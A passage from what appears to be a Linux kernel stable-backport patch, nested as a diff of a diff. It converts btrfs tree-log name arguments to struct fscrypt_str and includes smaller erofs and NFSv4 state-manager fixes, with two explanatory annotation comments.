+ 			ret = backref_in_log(log_root, &search_key,
+-					     parent_objectid, victim_name,
+-					     victim_name_len);
++					     parent_objectid, &victim_name);
+ 			if (ret < 0) {
+-				kfree(victim_name);
++				kfree(victim_name.name);
+ 				return ret;
+ 			} else if (!ret) {
+ 				ret = -ENOENT;
+@@ -1186,26 +1188,24 @@ again:
+ 
+ 					ret = unlink_inode_for_log_replay(trans,
+ 							BTRFS_I(victim_parent),
+-							inode,
+-							victim_name,
+-							victim_name_len);
++							inode, &victim_name);
+ 				}
+ 				iput(victim_parent);
+-				kfree(victim_name);
++				kfree(victim_name.name);
+ 				if (ret)
+ 					return ret;
+ 				goto again;
+ 			}
+-			kfree(victim_name);
++			kfree(victim_name.name);
+ next:
+-			cur_offset += victim_name_len + sizeof(*extref);
++			cur_offset += victim_name.len + sizeof(*extref);
+ 		}
+ 	}
+ 	btrfs_release_path(path);
+ 
+ 	/* look for a conflicting sequence number */
+ 	di = btrfs_lookup_dir_index_item(trans, root, path, btrfs_ino(dir),
+-					 ref_index, name, namelen, 0);
++					 ref_index, name, 0);
+ 	if (IS_ERR(di)) {
+ 		return PTR_ERR(di);
+ 	} else if (di) {
+@@ -1216,8 +1216,7 @@ next:
+ 	btrfs_release_path(path);
+ 
+ 	/* look for a conflicting name */
+-	di = btrfs_lookup_dir_item(trans, root, path, btrfs_ino(dir),
+-				   name, namelen, 0);
++	di = btrfs_lookup_dir_item(trans, root, path, btrfs_ino(dir), name, 0);
+ 	if (IS_ERR(di)) {
+ 		return PTR_ERR(di);
+ 	} else if (di) {
+@@ -1231,20 +1230,18 @@ next:
+ }
+ 
+ static int extref_get_fields(struct extent_buffer *eb, unsigned long ref_ptr,
+-			     u32 *namelen, char **name, u64 *index,
++			     struct fscrypt_str *name, u64 *index,
+ 			     u64 *parent_objectid)
+ {
+ 	struct btrfs_inode_extref *extref;
++	int ret;
+ 
+ 	extref = (struct btrfs_inode_extref *)ref_ptr;
+ 
+-	*namelen = btrfs_inode_extref_name_len(eb, extref);
+-	*name = kmalloc(*namelen, GFP_NOFS);
+-	if (*name == NULL)
+-		return -ENOMEM;
+-
+-	read_extent_buffer(eb, *name, (unsigned long)&extref->name,
+-			   *namelen);
++	ret = read_alloc_one_name(eb, &extref->name,
++				  btrfs_inode_extref_name_len(eb, extref), name);
++	if (ret)
++		return ret;
+ 
+ 	if (index)
+ 		*index = btrfs_inode_extref_index(eb, extref);
+@@ -1255,18 +1252,17 @@ static int extref_get_fields(struct extent_buffer *eb, unsigned long ref_ptr,
+ }
+ 
+ static int ref_get_fields(struct extent_buffer *eb, unsigned long ref_ptr,
+-			  u32 *namelen, char **name, u64 *index)
++			  struct fscrypt_str *name, u64 *index)
+ {
+ 	struct btrfs_inode_ref *ref;
++	int ret;
+ 
+ 	ref = (struct btrfs_inode_ref *)ref_ptr;
+ 
+-	*namelen = btrfs_inode_ref_name_len(eb, ref);
+-	*name = kmalloc(*namelen, GFP_NOFS);
+-	if (*name == NULL)
+-		return -ENOMEM;
+-
+-	read_extent_buffer(eb, *name, (unsigned long)(ref + 1), *namelen);
++	ret = read_alloc_one_name(eb, ref + 1, btrfs_inode_ref_name_len(eb, ref),
++				  name);
++	if (ret)
++		return ret;
+ 
+ 	if (index)
+ 		*index = btrfs_inode_ref_index(eb, ref);
+@@ -1308,28 +1304,24 @@ again:
+ 	ref_ptr = btrfs_item_ptr_offset(eb, path->slots[0]);
+ 	ref_end = ref_ptr + btrfs_item_size(eb, path->slots[0]);
+ 	while (ref_ptr < ref_end) {
+-		char *name = NULL;
+-		int namelen;
++		struct fscrypt_str name;
+ 		u64 parent_id;
+ 
+ 		if (key->type == BTRFS_INODE_EXTREF_KEY) {
+-			ret = extref_get_fields(eb, ref_ptr, &namelen, &name,
++			ret = extref_get_fields(eb, ref_ptr, &name,
+ 						NULL, &parent_id);
+ 		} else {
+ 			parent_id = key->offset;
+-			ret = ref_get_fields(eb, ref_ptr, &namelen, &name,
+-					     NULL);
++			ret = ref_get_fields(eb, ref_ptr, &name, NULL);
+ 		}
+ 		if (ret)
+ 			goto out;
+ 
+ 		if (key->type == BTRFS_INODE_EXTREF_KEY)
+ 			ret = !!btrfs_find_name_in_ext_backref(log_eb, log_slot,
+-							       parent_id, name,
+-							       namelen);
++							       parent_id, &name);
+ 		else
+-			ret = !!btrfs_find_name_in_backref(log_eb, log_slot,
+-							   name, namelen);
++			ret = !!btrfs_find_name_in_backref(log_eb, log_slot, &name);
+ 
+ 		if (!ret) {
+ 			struct inode *dir;
+@@ -1338,20 +1330,20 @@ again:
+ 			dir = read_one_inode(root, parent_id);
+ 			if (!dir) {
+ 				ret = -ENOENT;
+-				kfree(name);
++				kfree(name.name);
+ 				goto out;
+ 			}
+ 			ret = unlink_inode_for_log_replay(trans, BTRFS_I(dir),
+-						 inode, name, namelen);
+-			kfree(name);
++						 inode, &name);
++			kfree(name.name);
+ 			iput(dir);
+ 			if (ret)
+ 				goto out;
+ 			goto again;
+ 		}
+ 
+-		kfree(name);
+-		ref_ptr += namelen;
++		kfree(name.name);
++		ref_ptr += name.len;
+ 		if (key->type == BTRFS_INODE_EXTREF_KEY)
+ 			ref_ptr += sizeof(struct btrfs_inode_extref);
+ 		else
+@@ -1380,8 +1372,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 	struct inode *inode = NULL;
+ 	unsigned long ref_ptr;
+ 	unsigned long ref_end;
+-	char *name = NULL;
+-	int namelen;
++	struct fscrypt_str name;
+ 	int ret;
+ 	int log_ref_ver = 0;
+ 	u64 parent_objectid;
+@@ -1425,7 +1416,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 
+ 	while (ref_ptr < ref_end) {
+ 		if (log_ref_ver) {
+-			ret = extref_get_fields(eb, ref_ptr, &namelen, &name,
++			ret = extref_get_fields(eb, ref_ptr, &name,
+ 						&ref_index, &parent_objectid);
+ 			/*
+ 			 * parent object can change from one array
+@@ -1438,15 +1429,13 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 				goto out;
+ 			}
+ 		} else {
+-			ret = ref_get_fields(eb, ref_ptr, &namelen, &name,
+-					     &ref_index);
++			ret = ref_get_fields(eb, ref_ptr, &name, &ref_index);
+ 		}
+ 		if (ret)
+ 			goto out;
+ 
+ 		ret = inode_in_dir(root, path, btrfs_ino(BTRFS_I(dir)),
+-				   btrfs_ino(BTRFS_I(inode)), ref_index,
+-				   name, namelen);
++				   btrfs_ino(BTRFS_I(inode)), ref_index, &name);
+ 		if (ret < 0) {
+ 			goto out;
+ 		} else if (ret == 0) {
+@@ -1460,7 +1449,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 			ret = __add_inode_ref(trans, root, path, log,
+ 					      BTRFS_I(dir), BTRFS_I(inode),
+ 					      inode_objectid, parent_objectid,
+-					      ref_index, name, namelen);
++					      ref_index, &name);
+ 			if (ret) {
+ 				if (ret == 1)
+ 					ret = 0;
+@@ -1469,7 +1458,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 
+ 			/* insert our name */
+ 			ret = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode),
+-					     name, namelen, 0, ref_index);
++					     &name, 0, ref_index);
+ 			if (ret)
+ 				goto out;
+ 
+@@ -1479,9 +1468,9 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 		}
+ 		/* Else, ret == 1, we already have a perfect match, we're done. */
+ 
+-		ref_ptr = (unsigned long)(ref_ptr + ref_struct_size) + namelen;
+-		kfree(name);
+-		name = NULL;
++		ref_ptr = (unsigned long)(ref_ptr + ref_struct_size) + name.len;
++		kfree(name.name);
++		name.name = NULL;
+ 		if (log_ref_ver) {
+ 			iput(dir);
+ 			dir = NULL;
+@@ -1505,7 +1494,7 @@ static noinline int add_inode_ref(struct btrfs_trans_handle *trans,
+ 	ret = overwrite_item(trans, root, path, eb, slot, key);
+ out:
+ 	btrfs_release_path(path);
+-	kfree(name);
++	kfree(name.name);
+ 	iput(dir);
+ 	iput(inode);
+ 	return ret;
+@@ -1777,7 +1766,7 @@ static noinline int link_to_fixup_dir(struct btrfs_trans_handle *trans,
+ static noinline int insert_one_name(struct btrfs_trans_handle *trans,
+ 				    struct btrfs_root *root,
+ 				    u64 dirid, u64 index,
+-				    char *name, int name_len,
++				    const struct fscrypt_str *name,
+ 				    struct btrfs_key *location)
+ {
+ 	struct inode *inode;
+@@ -1795,7 +1784,7 @@ static noinline int insert_one_name(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode), name,
+-			name_len, 1, index);
++			     1, index);
+ 
+ 	/* FIXME, put inode into FIXUP list */
+ 
+@@ -1855,8 +1844,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 				    struct btrfs_dir_item *di,
+ 				    struct btrfs_key *key)
+ {
+-	char *name;
+-	int name_len;
++	struct fscrypt_str name;
+ 	struct btrfs_dir_item *dir_dst_di;
+ 	struct btrfs_dir_item *index_dst_di;
+ 	bool dir_dst_matches = false;
+@@ -1874,17 +1862,11 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	if (!dir)
+ 		return -EIO;
+ 
+-	name_len = btrfs_dir_name_len(eb, di);
+-	name = kmalloc(name_len, GFP_NOFS);
+-	if (!name) {
+-		ret = -ENOMEM;
++	ret = read_alloc_one_name(eb, di + 1, btrfs_dir_name_len(eb, di), &name);
++	if (ret)
+ 		goto out;
+-	}
+ 
+ 	log_type = btrfs_dir_type(eb, di);
+-	read_extent_buffer(eb, name, (unsigned long)(di + 1),
+-		   name_len);
+-
+ 	btrfs_dir_item_key_to_cpu(eb, di, &log_key);
+ 	ret = btrfs_lookup_inode(trans, root, path, &log_key, 0);
+ 	btrfs_release_path(path);
+@@ -1894,7 +1876,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	ret = 0;
+ 
+ 	dir_dst_di = btrfs_lookup_dir_item(trans, root, path, key->objectid,
+-					   name, name_len, 1);
++					   &name, 1);
+ 	if (IS_ERR(dir_dst_di)) {
+ 		ret = PTR_ERR(dir_dst_di);
+ 		goto out;
+@@ -1911,7 +1893,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 
+ 	index_dst_di = btrfs_lookup_dir_index_item(trans, root, path,
+ 						   key->objectid, key->offset,
+-						   name, name_len, 1);
++						   &name, 1);
+ 	if (IS_ERR(index_dst_di)) {
+ 		ret = PTR_ERR(index_dst_di);
+ 		goto out;
+@@ -1939,7 +1921,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	search_key.objectid = log_key.objectid;
+ 	search_key.type = BTRFS_INODE_REF_KEY;
+ 	search_key.offset = key->objectid;
+-	ret = backref_in_log(root->log_root, &search_key, 0, name, name_len);
++	ret = backref_in_log(root->log_root, &search_key, 0, &name);
+ 	if (ret < 0) {
+ 	        goto out;
+ 	} else if (ret) {
+@@ -1952,8 +1934,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	search_key.objectid = log_key.objectid;
+ 	search_key.type = BTRFS_INODE_EXTREF_KEY;
+ 	search_key.offset = key->objectid;
+-	ret = backref_in_log(root->log_root, &search_key, key->objectid, name,
+-			     name_len);
++	ret = backref_in_log(root->log_root, &search_key, key->objectid, &name);
+ 	if (ret < 0) {
+ 		goto out;
+ 	} else if (ret) {
+@@ -1964,7 +1945,7 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 	}
+ 	btrfs_release_path(path);
+ 	ret = insert_one_name(trans, root, key->objectid, key->offset,
+-			      name, name_len, &log_key);
++			      &name, &log_key);
+ 	if (ret && ret != -ENOENT && ret != -EEXIST)
+ 		goto out;
+ 	if (!ret)
+@@ -1974,10 +1955,10 @@ static noinline int replay_one_name(struct btrfs_trans_handle *trans,
+ 
+ out:
+ 	if (!ret && update_size) {
+-		btrfs_i_size_write(BTRFS_I(dir), dir->i_size + name_len * 2);
++		btrfs_i_size_write(BTRFS_I(dir), dir->i_size + name.len * 2);
+ 		ret = btrfs_update_inode(trans, root, BTRFS_I(dir));
+ 	}
+-	kfree(name);
++	kfree(name.name);
+ 	iput(dir);
+ 	if (!ret && name_added)
+ 		ret = 1;
+@@ -2143,8 +2124,7 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ 	struct extent_buffer *eb;
+ 	int slot;
+ 	struct btrfs_dir_item *di;
+-	int name_len;
+-	char *name;
++	struct fscrypt_str name;
+ 	struct inode *inode = NULL;
+ 	struct btrfs_key location;
+ 
+@@ -2159,22 +2139,16 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ 	eb = path->nodes[0];
+ 	slot = path->slots[0];
+ 	di = btrfs_item_ptr(eb, slot, struct btrfs_dir_item);
+-	name_len = btrfs_dir_name_len(eb, di);
+-	name = kmalloc(name_len, GFP_NOFS);
+-	if (!name) {
+-		ret = -ENOMEM;
++	ret = read_alloc_one_name(eb, di + 1, btrfs_dir_name_len(eb, di), &name);
++	if (ret)
+ 		goto out;
+-	}
+-
+-	read_extent_buffer(eb, name, (unsigned long)(di + 1), name_len);
+ 
+ 	if (log) {
+ 		struct btrfs_dir_item *log_di;
+ 
+ 		log_di = btrfs_lookup_dir_index_item(trans, log, log_path,
+ 						     dir_key->objectid,
+-						     dir_key->offset,
+-						     name, name_len, 0);
++						     dir_key->offset, &name, 0);
+ 		if (IS_ERR(log_di)) {
+ 			ret = PTR_ERR(log_di);
+ 			goto out;
+@@ -2200,7 +2174,7 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ 
+ 	inc_nlink(inode);
+ 	ret = unlink_inode_for_log_replay(trans, BTRFS_I(dir), BTRFS_I(inode),
+-					  name, name_len);
++					  &name);
+ 	/*
+ 	 * Unlike dir item keys, dir index keys can only have one name (entry) in
+ 	 * them, as there are no key collisions since each key has a unique offset
+@@ -2209,7 +2183,7 @@ static noinline int check_item_in_log(struct btrfs_trans_handle *trans,
+ out:
+ 	btrfs_release_path(path);
+ 	btrfs_release_path(log_path);
+-	kfree(name);
++	kfree(name.name);
+ 	iput(inode);
+ 	return ret;
+ }
+@@ -3443,7 +3417,7 @@ static int del_logged_dentry(struct btrfs_trans_handle *trans,
+ 			     struct btrfs_root *log,
+ 			     struct btrfs_path *path,
+ 			     u64 dir_ino,
+-			     const char *name, int name_len,
++			     const struct fscrypt_str *name,
+ 			     u64 index)
+ {
+ 	struct btrfs_dir_item *di;
+@@ -3453,7 +3427,7 @@ static int del_logged_dentry(struct btrfs_trans_handle *trans,
+ 	 * for dir item keys.
+ 	 */
+ 	di = btrfs_lookup_dir_index_item(trans, log, path, dir_ino,
+-					 index, name, name_len, -1);
++					 index, name, -1);
+ 	if (IS_ERR(di))
+ 		return PTR_ERR(di);
+ 	else if (!di)
+@@ -3490,7 +3464,7 @@ static int del_logged_dentry(struct btrfs_trans_handle *trans,
+  */
+ void btrfs_del_dir_entries_in_log(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_root *root,
+-				  const char *name, int name_len,
++				  const struct fscrypt_str *name,
+ 				  struct btrfs_inode *dir, u64 index)
+ {
+ 	struct btrfs_path *path;
+@@ -3517,7 +3491,7 @@ void btrfs_del_dir_entries_in_log(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	ret = del_logged_dentry(trans, root->log_root, path, btrfs_ino(dir),
+-				name, name_len, index);
++				name, index);
+ 	btrfs_free_path(path);
+ out_unlock:
+ 	mutex_unlock(&dir->log_mutex);
+@@ -3529,7 +3503,7 @@ out_unlock:
+ /* see comments for btrfs_del_dir_entries_in_log */
+ void btrfs_del_inode_ref_in_log(struct btrfs_trans_handle *trans,
+ 				struct btrfs_root *root,
+-				const char *name, int name_len,
++				const struct fscrypt_str *name,
+ 				struct btrfs_inode *inode, u64 dirid)
+ {
+ 	struct btrfs_root *log;
+@@ -3550,7 +3524,7 @@ void btrfs_del_inode_ref_in_log(struct btrfs_trans_handle *trans,
+ 	log = root->log_root;
+ 	mutex_lock(&inode->log_mutex);
+ 
+-	ret = btrfs_del_inode_ref(trans, log, name, name_len, btrfs_ino(inode),
++	ret = btrfs_del_inode_ref(trans, log, name, btrfs_ino(inode),
+ 				  dirid, &index);
+ 	mutex_unlock(&inode->log_mutex);
+ 	if (ret < 0 && ret != -ENOENT)
+@@ -5293,6 +5267,7 @@ static int btrfs_check_ref_name_override(struct extent_buffer *eb,
+ 		u32 this_len;
+ 		unsigned long name_ptr;
+ 		struct btrfs_dir_item *di;
++		struct fscrypt_str name_str;
+ 
+ 		if (key->type == BTRFS_INODE_REF_KEY) {
+ 			struct btrfs_inode_ref *iref;
+@@ -5326,8 +5301,11 @@ static int btrfs_check_ref_name_override(struct extent_buffer *eb,
+ 		}
+ 
+ 		read_extent_buffer(eb, name, name_ptr, this_name_len);
++
++		name_str.name = name;
++		name_str.len = this_name_len;
+ 		di = btrfs_lookup_dir_item(NULL, inode->root, search_path,
+-				parent, name, this_name_len, 0);
++				parent, &name_str, 0);
+ 		if (di && !IS_ERR(di)) {
+ 			struct btrfs_key di_key;
+ 
+@@ -7493,9 +7471,14 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 	if (old_dir && old_dir->logged_trans == trans->transid) {
+ 		struct btrfs_root *log = old_dir->root->log_root;
+ 		struct btrfs_path *path;
++		struct fscrypt_name fname;
+ 
+ 		ASSERT(old_dir_index >= BTRFS_DIR_START_INDEX);
+ 
++		ret = fscrypt_setup_filename(&old_dir->vfs_inode,
++					     &old_dentry->d_name, 0, &fname);
++		if (ret)
++			goto out;
+ 		/*
+ 		 * We have two inodes to update in the log, the old directory and
+ 		 * the inode that got renamed, so we must pin the log to prevent
+@@ -7508,13 +7491,17 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 		 * not fail, but if it does, it's not serious, just bail out and
+ 		 * mark the log for a full commit.
+ 		 */
+-		if (WARN_ON_ONCE(ret < 0))
++		if (WARN_ON_ONCE(ret < 0)) {
++			fscrypt_free_filename(&fname);
+ 			goto out;
++		}
++
+ 		log_pinned = true;
+ 
+ 		path = btrfs_alloc_path();
+ 		if (!path) {
+ 			ret = -ENOMEM;
++			fscrypt_free_filename(&fname);
+ 			goto out;
+ 		}
+ 
+@@ -7530,8 +7517,7 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 		 */
+ 		mutex_lock(&old_dir->log_mutex);
+ 		ret = del_logged_dentry(trans, log, path, btrfs_ino(old_dir),
+-					old_dentry->d_name.name,
+-					old_dentry->d_name.len, old_dir_index);
++					&fname.disk_name, old_dir_index);
+ 		if (ret > 0) {
+ 			/*
+ 			 * The dentry does not exist in the log, so record its
+@@ -7545,6 +7531,7 @@ void btrfs_log_new_name(struct btrfs_trans_handle *trans,
+ 		mutex_unlock(&old_dir->log_mutex);
+ 
+ 		btrfs_free_path(path);
++		fscrypt_free_filename(&fname);
+ 		if (ret < 0)
+ 			goto out;
+ 	}
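
/*
 * Annotation, not part of the patch: the fscrypt_str conversion above
 * funnels every name copy through read_alloc_one_name(), whose
 * definition sits earlier in this patch. A minimal sketch of what the
 * call sites imply it does (hedged paraphrase, not the verbatim hunk):
 */
static int read_alloc_one_name(struct extent_buffer *eb, void *start,
			       int len, struct fscrypt_str *name)
{
	char *buf;

	buf = kmalloc(len, GFP_NOFS);
	if (!buf)
		return -ENOMEM;

	/* copy the name out of the extent buffer and hand it over */
	read_extent_buffer(eb, buf, (unsigned long)start, len);
	name->name = buf;
	name->len = len;
	return 0;
}
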
+diff --git a/fs/btrfs/tree-log.h b/fs/btrfs/tree-log.h
+index bcca74128c3bb..8adebf4c9adaf 100644
+--- a/fs/btrfs/tree-log.h
++++ b/fs/btrfs/tree-log.h
+@@ -84,11 +84,11 @@ int btrfs_log_dentry_safe(struct btrfs_trans_handle *trans,
+ 			  struct btrfs_log_ctx *ctx);
+ void btrfs_del_dir_entries_in_log(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_root *root,
+-				  const char *name, int name_len,
++				  const struct fscrypt_str *name,
+ 				  struct btrfs_inode *dir, u64 index);
+ void btrfs_del_inode_ref_in_log(struct btrfs_trans_handle *trans,
+ 				struct btrfs_root *root,
+-				const char *name, int name_len,
++				const struct fscrypt_str *name,
+ 				struct btrfs_inode *inode, u64 dirid);
+ void btrfs_end_log_trans(struct btrfs_root *root);
+ void btrfs_pin_log_trans(struct btrfs_root *root);
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 5cd612a8f8584..49addc345aebe 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -217,9 +217,12 @@ again:
+ 			strm->buf.out_size = min_t(u32, outlen,
+ 						   PAGE_SIZE - pageofs);
+ 			outlen -= strm->buf.out_size;
+-			if (!rq->out[no] && rq->fillgaps)	/* deduped */
++			if (!rq->out[no] && rq->fillgaps) {	/* deduped */
+ 				rq->out[no] = erofs_allocpage(pagepool,
+ 						GFP_KERNEL | __GFP_NOFAIL);
++				set_page_private(rq->out[no],
++						 Z_EROFS_SHORTLIVED_PAGE);
++			}
+ 			if (rq->out[no])
+ 				strm->buf.out = kmap(rq->out[no]) + pageofs;
+ 			pageofs = 0;
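
/*
 * Annotation, not part of the patch: the hunk above marks gap-fill
 * pages as short-lived via page_private() so the z_erofs teardown
 * frees them rather than treating them as file pages. A hedged sketch
 * of the check this marking enables, modelled on the zdata helper:
 */
static inline bool z_erofs_is_shortlived_page(struct page *page)
{
	return page_private(page) == Z_EROFS_SHORTLIVED_PAGE;
}
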
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index be570c65ae154..e1297c6bcfbe2 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -7157,7 +7157,6 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ {
+ 	struct nfs4_lockdata *data = calldata;
+ 	struct nfs4_lock_state *lsp = data->lsp;
+-	struct nfs_server *server = NFS_SERVER(d_inode(data->ctx->dentry));
+ 
+ 	if (!nfs4_sequence_done(task, &data->res.seq_res))
+ 		return;
+@@ -7165,7 +7164,8 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ 	data->rpc_status = task->tk_status;
+ 	switch (task->tk_status) {
+ 	case 0:
+-		renew_lease(server, data->timestamp);
++		renew_lease(NFS_SERVER(d_inode(data->ctx->dentry)),
++				data->timestamp);
+ 		if (data->arg.new_lock && !data->cancelled) {
+ 			data->fl.fl_flags &= ~(FL_SLEEP | FL_ACCESS);
+ 			if (locks_lock_inode_wait(lsp->ls_state->inode, &data->fl) < 0)
+@@ -7193,8 +7193,6 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ 			if (!nfs4_stateid_match(&data->arg.open_stateid,
+ 						&lsp->ls_state->open_stateid))
+ 				goto out_restart;
+-			else if (nfs4_async_handle_error(task, server, lsp->ls_state, NULL) == -EAGAIN)
+-				goto out_restart;
+ 		} else if (!nfs4_stateid_match(&data->arg.lock_stateid,
+ 						&lsp->ls_stateid))
+ 				goto out_restart;
+@@ -10629,7 +10627,9 @@ static void nfs4_disable_swap(struct inode *inode)
+ 	 */
+ 	struct nfs_client *clp = NFS_SERVER(inode)->nfs_client;
+ 
+-	nfs4_schedule_state_manager(clp);
++	set_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state);
++	clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
++	wake_up_var(&clp->cl_state);
+ }
+ 
+ static const struct inode_operations nfs4_dir_inode_operations = {
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 5b49e5365bb30..457b2b2f804ab 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -1209,17 +1209,23 @@ void nfs4_schedule_state_manager(struct nfs_client *clp)
+ {
+ 	struct task_struct *task;
+ 	char buf[INET6_ADDRSTRLEN + sizeof("-manager") + 1];
+-	struct rpc_clnt *cl = clp->cl_rpcclient;
+-
+-	while (cl != cl->cl_parent)
+-		cl = cl->cl_parent;
++	struct rpc_clnt *clnt = clp->cl_rpcclient;
++	bool swapon = false;
+ 
+ 	set_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state);
+-	if (test_and_set_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state) != 0) {
+-		wake_up_var(&clp->cl_state);
+-		return;
++
++	if (atomic_read(&clnt->cl_swapper)) {
++		swapon = !test_and_set_bit(NFS4CLNT_MANAGER_AVAILABLE,
++					   &clp->cl_state);
++		if (!swapon) {
++			wake_up_var(&clp->cl_state);
++			return;
++		}
+ 	}
+-	set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state);
++
++	if (test_and_set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state) != 0)
++		return;
++
+ 	__module_get(THIS_MODULE);
+ 	refcount_inc(&clp->cl_count);
+ 
+@@ -1236,8 +1242,9 @@ void nfs4_schedule_state_manager(struct nfs_client *clp)
+ 			__func__, PTR_ERR(task));
+ 		if (!nfs_client_init_is_complete(clp))
+ 			nfs_mark_client_ready(clp, PTR_ERR(task));
++		if (swapon)
++			clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 		nfs4_clear_state_manager_bit(clp);
+-		clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 		nfs_put_client(clp);
+ 		module_put(THIS_MODULE);
+ 	}
+@@ -2703,6 +2710,13 @@ static void nfs4_state_manager(struct nfs_client *clp)
+ 		nfs4_end_drain_session(clp);
+ 		nfs4_clear_state_manager_bit(clp);
+ 
++		if (test_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state) &&
++		    !test_and_set_bit(NFS4CLNT_MANAGER_RUNNING,
++				      &clp->cl_state)) {
++			memflags = memalloc_nofs_save();
++			continue;
++		}
++
+ 		if (!test_and_set_bit(NFS4CLNT_RECALL_RUNNING, &clp->cl_state)) {
+ 			if (test_and_clear_bit(NFS4CLNT_DELEGRETURN, &clp->cl_state)) {
+ 				nfs_client_return_marked_delegations(clp);
+@@ -2741,22 +2755,25 @@ static int nfs4_run_state_manager(void *ptr)
+ 
+ 	allow_signal(SIGKILL);
+ again:
+-	set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state);
+ 	nfs4_state_manager(clp);
+-	if (atomic_read(&cl->cl_swapper)) {
++
++	if (test_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state) &&
++	    !test_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state)) {
+ 		wait_var_event_interruptible(&clp->cl_state,
+ 					     test_bit(NFS4CLNT_RUN_MANAGER,
+ 						      &clp->cl_state));
+-		if (atomic_read(&cl->cl_swapper) &&
+-		    test_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state))
++		if (!atomic_read(&cl->cl_swapper))
++			clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
++		if (refcount_read(&clp->cl_count) > 1 && !signalled() &&
++		    !test_and_set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state))
+ 			goto again;
+ 		/* Either no longer a swapper, or were signalled */
++		clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 	}
+-	clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 
+ 	if (refcount_read(&clp->cl_count) > 1 && !signalled() &&
+ 	    test_bit(NFS4CLNT_RUN_MANAGER, &clp->cl_state) &&
+-	    !test_and_set_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state))
++	    !test_and_set_bit(NFS4CLNT_MANAGER_RUNNING, &clp->cl_state))
+ 		goto again;
+ 
+ 	nfs_put_client(clp);
+diff --git a/fs/nfs/sysfs.c b/fs/nfs/sysfs.c
+index a6f7403669631..edb535a0ff973 100644
+--- a/fs/nfs/sysfs.c
++++ b/fs/nfs/sysfs.c
+@@ -18,7 +18,7 @@
+ #include "sysfs.h"
+ 
+ struct kobject *nfs_client_kobj;
+-static struct kset *nfs_client_kset;
++static struct kset *nfs_kset;
+ 
+ static void nfs_netns_object_release(struct kobject *kobj)
+ {
+@@ -55,13 +55,13 @@ static struct kobject *nfs_netns_object_alloc(const char *name,
+ 
+ int nfs_sysfs_init(void)
+ {
+-	nfs_client_kset = kset_create_and_add("nfs", NULL, fs_kobj);
+-	if (!nfs_client_kset)
++	nfs_kset = kset_create_and_add("nfs", NULL, fs_kobj);
++	if (!nfs_kset)
+ 		return -ENOMEM;
+-	nfs_client_kobj = nfs_netns_object_alloc("net", nfs_client_kset, NULL);
++	nfs_client_kobj = nfs_netns_object_alloc("net", nfs_kset, NULL);
+ 	if  (!nfs_client_kobj) {
+-		kset_unregister(nfs_client_kset);
+-		nfs_client_kset = NULL;
++		kset_unregister(nfs_kset);
++		nfs_kset = NULL;
+ 		return -ENOMEM;
+ 	}
+ 	return 0;
+@@ -70,7 +70,7 @@ int nfs_sysfs_init(void)
+ void nfs_sysfs_exit(void)
+ {
+ 	kobject_put(nfs_client_kobj);
+-	kset_unregister(nfs_client_kset);
++	kset_unregister(nfs_kset);
+ }
+ 
+ static ssize_t nfs_netns_identifier_show(struct kobject *kobj,
+@@ -159,7 +159,7 @@ static struct nfs_netns_client *nfs_netns_client_alloc(struct kobject *parent,
+ 	p = kzalloc(sizeof(*p), GFP_KERNEL);
+ 	if (p) {
+ 		p->net = net;
+-		p->kobject.kset = nfs_client_kset;
++		p->kobject.kset = nfs_kset;
